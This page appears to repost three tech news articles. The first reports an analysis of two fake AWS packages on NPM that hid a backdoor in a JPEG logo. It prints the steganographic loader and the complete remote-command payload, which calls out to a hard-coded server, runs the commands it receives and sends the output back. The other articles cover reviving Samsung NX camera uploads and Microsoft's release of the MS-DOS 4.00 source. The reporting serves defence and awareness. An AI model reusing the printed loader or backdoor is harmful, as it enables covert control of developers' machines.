backdoors, Biz & IT, Open Source, Security, steganography / Mike M. / July 15, 2024

DEVS IN THE CROSSHAIRS —

Files available on the open source NPM repository underscore a growing sophistication.

Dan Goodin – Jul 15, 2024 8:18 pm UTC

A cartoon door leads to a wall of computer code.

Researchers have determined that two fake AWS packages downloaded hundreds of times from the open source NPM JavaScript repository contained carefully concealed code that backdoored developers’ computers when executed.

The packages, img-aws-s3-object-multipart-copy and legacyaws-s3-object-multipart-copy, were attempts to appear as aws-s3-object-multipart-copy, a legitimate JavaScript library for copying files using Amazon’s S3 cloud service. The fake files included all the code found in the legitimate library but added a JavaScript file named loadformat.js. That file provided what appeared to be benign code and three JPG images that were processed during package installation. One of those images contained code fragments that, when reconstructed, formed code for backdooring the developer device.
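Both impostor names embed the legitimate package name in full, so even a simple name check would have flagged them. The sketch below is a minimal illustration of that idea, not a description of how Phylum or npm detects such packages; the allowlist and the function name are hypothetical.

```javascript
// Hypothetical allowlist of packages a project actually depends on.
const KNOWN_PACKAGES = ["aws-s3-object-multipart-copy"];

// Flags a candidate name that contains a known package name
// without being an exact match for it.
function looksLikeImpersonation(candidate, known = KNOWN_PACKAGES) {
  return known.some((name) => candidate !== name && candidate.includes(name));
}

console.log(looksLikeImpersonation("img-aws-s3-object-multipart-copy")); // true
console.log(looksLikeImpersonation("aws-s3-object-multipart-copy")); // false
```

A substring test like this misses misspellings and character swaps, so it would complement rather than replace other checks.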

Growing sophistication

“We have reported these packages for removal, however the malicious packages remained available on npm for nearly two days,” researchers from Phylum, the security firm that spotted the packages, wrote. “This is worrying as it implies that most systems are unable to detect and promptly report on these packages, leaving developers vulnerable to attack for longer periods of time.”

In an email, Phylum Head of Research Ross Bryant said img-aws-s3-object-multipart-copy received 134 downloads before it was taken down. The other file, legacyaws-s3-object-multipart-copy, got 48.

The care the package developers put into the code and the effectiveness of their tactics underscore the growing sophistication of attacks targeting open source repositories, which besides NPM have included PyPI, GitHub, and RubyGems. The advances made it possible for the vast majority of malware-scanning products to miss the backdoor sneaked into these two packages. In the past 17 months, threat actors backed by the North Korean government have targeted developers twice, one of those using a zero-day vulnerability.

Phylum researchers provided a deep-dive analysis of how the concealment worked:

Analyzing the loadformat.js file, we find what appears to be some fairly innocuous image analysis code.

However, upon closer review, we see that this code is doing a few interesting things, resulting in execution on the victim machine.

After reading the image file from the disk, each byte is analyzed. Any bytes with a value between 32 and 126 are converted from Unicode values into a character and appended to the analyzepixels variable.
    function processImage(filePath) {
      console.log("Processing image...");
      const data = fs.readFileSync(filePath);
      let analyzepixels = "";
      let convertertree = false;

      for (let i = 0; i < data.length; i++) {
        const value = data[i];
        if (value >= 32 && value <= 126) {
          analyzepixels += String.fromCharCode(value);
        } else {
          if (analyzepixels.length > 2000) {
            convertertree = true;
            break;
          }
          analyzepixels = "";
        }
      }

      // ...
The threat actor then defines two distinct bodies of a function and stores each in their own variables, imagebyte and analyzePixels.
    let analyzePixеls = `
      if (false) {
        exec("node -v", (error, stdout, stderr) => {
          console.log(stdout);
        });
      }
      console.log("check nodejs version...");
    `;

    let imagebyte = `
      const httpsOptions = {
        hostname: 'cloudconvert.com',
        path: '/image-converter',
        method: 'POST'
      };
      const req = https.request(httpsOptions, res => {
        console.log('Status Code:', res.statusCode);
      });
      req.on('error', error => {
        console.error(error);
      });
      req.end();
      console.log("Executing operation...");
    `;
If convertertree is set to true, imagebyte is set to analyzepixels. In plain language, if convertertree is set, it will execute whatever is contained in the script we extracted from the image file.
    if (convertertree) {
      console.log("Optimization complete. Applying advanced features...");
      imagebyte = analyzepixels;
    } else {
      console.log("Optimization complete. No advanced features applied.");
    }
Looking back above, we note that convertertree will be set to true if the length of the bytes found in the image is greater than 2,000.
    if (analyzepixels.length > 2000) {
      convertertree = true;
      break;
    }
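The same threshold can be turned around for defensive use. The sketch below, assuming Node.js, measures the longest run of printable ASCII bytes in a buffer and flags anything above 2,000. The function names are made up here, and a real scanner would need more than this single heuristic.

```javascript
// Returns the length of the longest run of printable ASCII bytes (32 to 126).
function longestPrintableRun(bytes) {
  let longest = 0;
  let current = 0;
  for (const value of bytes) {
    if (value >= 32 && value <= 126) {
      current += 1;
      if (current > longest) longest = current;
    } else {
      current = 0;
    }
  }
  return longest;
}

// The default threshold mirrors the 2,000-character check in the loader.
function hasSuspiciousTextRun(bytes, threshold = 2000) {
  return longestPrintableRun(bytes) > threshold;
}
```

For a file on disk, the call would look like `hasSuspiciousTextRun(fs.readFileSync(path))`, where `fs` is Node's built-in file system module and `path` points at the image to inspect.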
The author then creates a new function using either code that sends an empty POST request to cloudconvert.com or initiates executing whatever was extracted from the image files.
    const func = new Function('https', 'exec', 'os', imagebyte);
    func(https, exec, os);
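For readers unfamiliar with the Function constructor, here is a harmless illustration of the mechanism. The leading arguments name the parameters and the final argument is the body, supplied as a string. Nothing in this sketch comes from the malicious package.

```javascript
// Parameter names come first; the last argument is the function body as text.
const add = new Function("a", "b", "return a + b;");
console.log(add(2, 3)); // 5

// The body can be assembled at runtime, so it never has to appear
// in the source file as recognizable code.
const body = ["return", "a", "*", "b;"].join(" ");
const multiply = new Function("a", "b", body);
console.log(multiply(4, 5)); // 20
```

Because the body is ordinary string data until the constructor compiles it, tools that only inspect a package's source text may have little to go on.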
The lingering question is, what is contained in the images that this is trying to execute?

Command-and-Control in a JPEG

Looking at the bottom of the loadformat.js file, we see the following:
    processImage('logo1.jpg');
    processImage('logo2.jpg');
    processImage('logo3.jpg');
We find these three files in the package’s root, which are included below without modification, unless otherwise noted.

Appears as logo1.jpg in the package

Appears as logo2.jpg in the package

Appears as logo3.jpg in the package. Modified here as the file is corrupted and in some cases would not display properly.

If we run each of these through the processImage(...) function from above, we find that the Intel image (i.e., logo1.jpg) does not contain enough “valid” bytes to set the convertertree variable to true. The same goes for logo3.jpg, the AMD logo. However, for the Microsoft logo (logo2.jpg), we find the following, formatted for readability:
    let fetchInterval = 0x1388;
    let intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);
    const clientInfo = {
      'name': os.hostname(),
      'os': os.type() + " " + os.release()
    };
    const agent = new https.Agent({
      'rejectUnauthorized': false
    });
    function registerClient() {
      const _0x47c6de = JSON.stringify(clientInfo);
      const _0x5a10c1 = {
        'hostname': "85.208.108.29",
        'port': 0x1bb,
        'path': "/register",
        'method': "POST",
        'headers': {
          'Content-Type': "application/json",
          'Content-Length': Buffer.byteLength(_0x47c6de)
        },
        'agent': agent
      };
      const _0x38f695 = https.request(_0x5a10c1, _0x454719 => {
        console.log("Registered with server as " + clientInfo.name);
      });
      _0x38f695.on("error", _0x1159ec => {
        console.error("Problem with registration: " + _0x1159ec.message);
      });
      _0x38f695.write(_0x47c6de);
      _0x38f695.end();
    }
    function fetchAndExecuteCommand() {
      const _0x2dae30 = {
        'hostname': "85.208.108.29",
        'port': 0x1bb,
        'path': "/get-command?clientId=" + encodeURIComponent(clientInfo.name),
        'method': "GET",
        'agent': agent
      };
      https.get(_0x2dae30, _0x4a0c09 => {
        let _0x41cd12 = '';
        _0x4a0c09.on("data", _0x5cbbc5 => {
          _0x41cd12 += _0x5cbbc5.toString();
        });
        _0x4a0c09.on("end", () => {
          console.log("Received command:", _0x41cd12);
          if (_0x41cd12.startsWith('setInterval:')) {
            const _0x1e3896 = parseInt(_0x41cd12.split(':')[0x1], 0xa);
            if (!isNaN(_0x1e3896) && _0x1e3896 > 0x0) {
              clearInterval(intervalId);
              fetchInterval = _0x1e3896 * 0x3e8;
              intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);
              console.log("Interval has been updated to " + _0x1e3896 + " seconds.");
            } else {
              console.log("Invalid interval command received.");
            }
          } else {
            if (_0x41cd12.startsWith("cd ")) {
              const _0x58bd7d = _0x41cd12.substring(0x3).trim();
              try {
                process.chdir(_0x58bd7d);
                console.log("Changed directory to " + process.cwd());
              } catch (_0x2ee272) {
                console.error("Change directory failed: " + _0x2ee272);
              }
            } else if (_0x41cd12 !== "No commands") {
              exec(_0x41cd12, {
                'cwd': process.cwd()
              }, (_0x5da676, _0x1ae10c, _0x46788b) => {
                let _0x4a96cd = _0x1ae10c;
                if (_0x5da676) {
                  console.error("exec error: " + _0x5da676);
                  _0x4a96cd += "\nError: " + _0x46788b;
                }
                postResult(_0x4a96cd);
              });
            } else {
              console.log("No commands to execute");
            }
          }
        });
      }).on("error", _0x2e8190 => {
        console.error("Got error: " + _0x2e8190.message);
      });
    }
    function postResult(_0x1d73c1) {
      const _0xc05626 = {
        'hostname': "85.208.108.29",
        'port': 0x1bb,
        'path': "/post-result?clientId=" + encodeURIComponent(clientInfo.name),
        'method': "POST",
        'headers': {
          'Content-Type': "text/plain",
          'Content-Length': Buffer.byteLength(_0x1d73c1)
        },
        'agent': agent
      };
      const _0x2fcb05 = https.request(_0xc05626, _0x448ba6 => {
        console.log("Result sent to the server");
      });
      _0x2fcb05.on('error', _0x1f60a7 => {
        console.error("Problem with request: " + _0x1f60a7.message);
      });
      _0x2fcb05.write(_0x1d73c1);
      _0x2fcb05.end();
    }
    registerClient();
This code first registers the new client with the remote C2 by sending the following clientInfo to 85.208.108.29.
    const clientInfo = {
      'name': os.hostname(),
      'os': os.type() + " " + os.release()
    };
It then sets up an interval that periodically loops through and fetches commands from the attacker every 5 seconds.
    let fetchInterval = 0x1388;
    let intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);
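The payload writes its numbers as hexadecimal literals, which makes the 5-second figure less obvious at a glance. Decoding the literals that appear in the listing gives the values below; the variable names are chosen here for readability and are not in the original code.

```javascript
const pollIntervalMs = 0x1388; // 5000 milliseconds
const port = 0x1bb;            // 443, the standard HTTPS port
const msPerSecond = 0x3e8;     // 1000
const radix = 0xa;             // 10, the base passed to parseInt

// 5000 ms divided by 1000 ms per second gives the 5-second polling interval.
const pollIntervalSeconds = pollIntervalMs / msPerSecond;
console.log(pollIntervalSeconds); // 5
```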
Received commands are executed on the device, and the output is sent back to the attacker on the endpoint /post-result?clientId=.

One of the most innovative methods in recent memory for concealing an open source backdoor was discovered in March, just weeks before it was to be included in a production release of the XZ Utils, a data-compression utility available on almost all installations of Linux. The backdoor was implemented through a five-stage loader that used a series of simple but clever techniques to hide itself. Once installed, the backdoor allowed the threat actors to log in to infected systems with administrative system rights.

The person or group responsible spent years working on the backdoor. Besides the sophistication of the concealment method, the entity devoted large amounts of time to producing high-quality code for open source projects in a successful effort to build trust with other developers.

In May, Phylum disrupted a separate campaign that backdoored a package available in PyPI that also used steganography, a technique that embeds secret code into images.

“In the last few years, we’ve seen a dramatic rise in the sophistication and volume of malicious packages published to open source ecosystems,” Phylum researchers wrote. “Make no mistake, these attacks are successful. It is absolutely imperative that developers and security organizations alike are keenly aware of this fact and are deeply vigilant with regard to open source libraries they consume.”


Samsung’s abandoned NX cameras can be brought online with a $20 LTE stick

Digital Camera, digital cameras, e-waste, firmware, firmware hacking, Open Source, samsung, samsung nx, samsung nx camera, Tech / Kris Guyer / July 9, 2024

Samsung: The Next Big Thing is Here (And Gone) —

All it took was a reverse-engineered camera firmware and a custom API rewrite.

Kevin Purdy – Jul 9, 2024 5:27 pm UTC

Samsung camera display next to a 4G LTE modem stick. Under-powered Samsung camera, meet over-powered 4G LTE dongle. Now work together to move pictures over the air.

Georg Lukas

Back in 2010—after the first iPhone, but before its camera was any good—a mirrorless, lens-swapping camera that could upload photos immediately to social media or photo storage sites was a novel proposition. That’s what Samsung’s NX cameras promised.

Unsurprisingly, Samsung didn’t keep that promise too much longer after it dropped its camera business and sales numbers disappeared. It tried out the quirky idea of jamming together Android phones and NX cameras in 2013, providing a more direct means of sending shots and clips to Instagram or YouTube. But it shut down its Social Network Services (SNS) entirely in 2021, leaving NX owners with the choices of manually transferring their photos or ditching their cameras (presuming they had not already moved on).

Some people, wonderfully, refuse to give up. People like Georg Lukas, who reverse-engineered Samsung’s SNS API to bring back a version of direct picture posting to Wi-Fi-enabled NX models, and even expand it. It was not easy, but at least the hardware is cheap. By reflashing the surprisingly capable board on a USB 4G dongle, Lukas is able to create a Wi-Fi hotspot with LTE uplink and run his modified version of Samsung’s (woefully insecure) service natively on the stick.

What is involved should you have such a camera? Here’s the shorter version of Lukas’ impressive redux:

Installing Debian on the LTE dongle’s board
Creating a Wi-Fi hotspot on the stick using NetworkManager
Compiling Lukas’ own upload server, written in Flask and Python
Configuring the web server now running on that dongle

The details of how Lukas reverse-engineered the firmware from a Samsung WB850F are posted on his blog. It is one of those Internet blog posts in which somebody describes something incredibly arcane, requiring a dozen kinds of knowledge backed by experience, with the casualness with which one might explain how to plant seeds in soil.

The hardest part of the whole experiment might be obtaining the 4G LTE stick itself. The Hackaday blog has detailed this stick (and also tipped us to this camera rebirth project), which is a purpose-built device that can be turned into a single-board computer again, on the level of a Raspberry Pi Zero 2 W, should you apply a new bootloader and stick Linux on it. You can find it on Alibaba for very cheap, or seemingly find it, because some versions of what looks like the same stick come with a far more limited CPU. You’re looking for a stick with the MSM8916 inside, sometimes listed as a “QualComm 8916.”

Lukas’ new version posts images to Mastodon, as demonstrated in his proof of life post. It could likely be extended to more of today’s social or backup services, should he or anybody else have the time and deep love for what are now kinda cruddy cameras. Here’s hoping today’s connected devices have similarly dedicated hackers in the future.


Microsoft open-sources infamously weird, RAM-hungry MS-DOS 4.00 release

MS-DOS, Open Source, Tech / Paul Patrick / April 27, 2024

a road not traveled —

DOS 4.00 was supposed to add multitasking to the OS, but it was not to be.

Andrew Cunningham – Apr 26, 2024 5:30 pm UTC

Microsoft has open-sourced another bit of computing history this week: The company teamed up with IBM to release the source code of 1988’s MS-DOS 4.00, a version better known for its unpopularity, bugginess, and convoluted development history than its utility as a computer operating system.

The MS-DOS 4.00 code is available on Microsoft’s MS-DOS GitHub page along with versions 1.25 and 2.0, which Microsoft open-sourced in cooperation with the Computer History Museum back in 2014. All open-source versions of DOS have been released under the MIT License.

Initially, MS-DOS 4.00 was slated to include new multitasking features that allowed software to run in the background. This release of DOS, also sometimes called “MT-DOS” or “Multitasking MS-DOS” to distinguish it from other releases, was only released through a few European PC OEMs and never as a standalone retail product.

The source code Microsoft released this week is not for that multitasking version of DOS 4.00, and Microsoft’s Open Source Programs Office was “unable to find the full source code” for MT-DOS when it went to look. Rather, Microsoft and IBM have released the source code for a totally separate version of DOS 4.00, primarily developed by IBM to add more features to the existing non-multitasking version of DOS that ran on most IBM PCs and PC clones of the day.

Microsoft never returned to its multitasking DOS idea in subsequent releases. Multitasking would become the purview of graphical operating systems like Windows and OS/2, while MS-DOS versions 5.x and 6.x continued with the old one-app-at-a-time model of earlier releases.

Microsoft has released some documentation and binary files for MT-DOS and “may update this release if more is discovered.” The company credits English researcher Connor “Starfrost” Hyde for shaking all of this source code loose as part of an ongoing examination of MT-DOS that he is documenting on his website. Hyde has posted many screenshots of a 1984-era build of MT-DOS, including of the “session manager” that it used to track and switch between running applications.

Confidential copies of the obscure, abandoned multitasking-capable version of MS-DOS 4.00. Microsoft has been unable to locate source code for this release, sometimes referred to as “MT-DOS” or “Multitasking MS-DOS.”

Microsoft

The publicly released version of MS-DOS 4.00 is known less for its new features than for its high memory usage; the 4.00 release could consume as much as 92KB of RAM, way up from the roughly 56KB used by MS-DOS 3.31, and the 4.01 release reduced this to about 86KB. The later MS-DOS 5.0 and 6.0 releases maxed out at 72 or 73KB, and even IBM’s PC DOS 2000 only wanted around 64KB.

These RAM numbers would be rounding errors on any modern computer, but in the days when RAM was pricey, systems maxed out at 640KB, and virtual memory wasn’t a thing, such a huge jump in system requirements was a big deal. Today’s retro-computing enthusiasts still tend to skip over MS-DOS 4.00, recommending either 3.31 for its lower memory usage or later versions for their expanded feature sets.
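To put those figures in proportion, a quick calculation of each release's footprint as a share of the 640KB ceiling may help. The inputs are the approximate numbers quoted above, and the helper name is made up for illustration.

```javascript
const CONVENTIONAL_MEMORY_KB = 640;

// Approximate footprints quoted in the article, in KB.
const footprintsKb = {
  "MS-DOS 3.31": 56,
  "MS-DOS 4.00": 92,
  "MS-DOS 4.01": 86,
};

// Hypothetical helper: percentage of the 640KB limit that a footprint consumes.
function percentOfConventionalMemory(kb) {
  return (kb / CONVENTIONAL_MEMORY_KB) * 100;
}

for (const [release, kb] of Object.entries(footprintsKb)) {
  const share = percentOfConventionalMemory(kb).toFixed(1);
  console.log(`${release}: ${kb}KB, roughly ${share}% of 640KB`);
}
```

By this measure, the jump from 3.31 to 4.00 cost an extra 36KB, or a little under 6 percent of all the memory a program could address.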

Microsoft has open-sourced some other legacy code over the years, including those older MS-DOS versions, Word for Windows 1.1a, 1983-era GW-BASIC, and the original Windows File Manager. While most of these have been released in their original forms without any updates or changes, the Windows File Manager is actually actively maintained. It was initially just changed enough to run natively on modern 64-bit and Arm PCs running Windows 10 and 11, but it’s been updated with new fixes and features as recently as March 2024.

The release of the MS-DOS 4.00 code isn’t the only new thing that DOS historians have gotten their hands on this year. One of the earliest known versions of 86-DOS, the software that Microsoft would buy and turn into the operating system for the original IBM PC, was discovered and uploaded to the Internet Archive in January. An early version of the abandoned Microsoft-developed version of OS/2 was also unearthed in March.
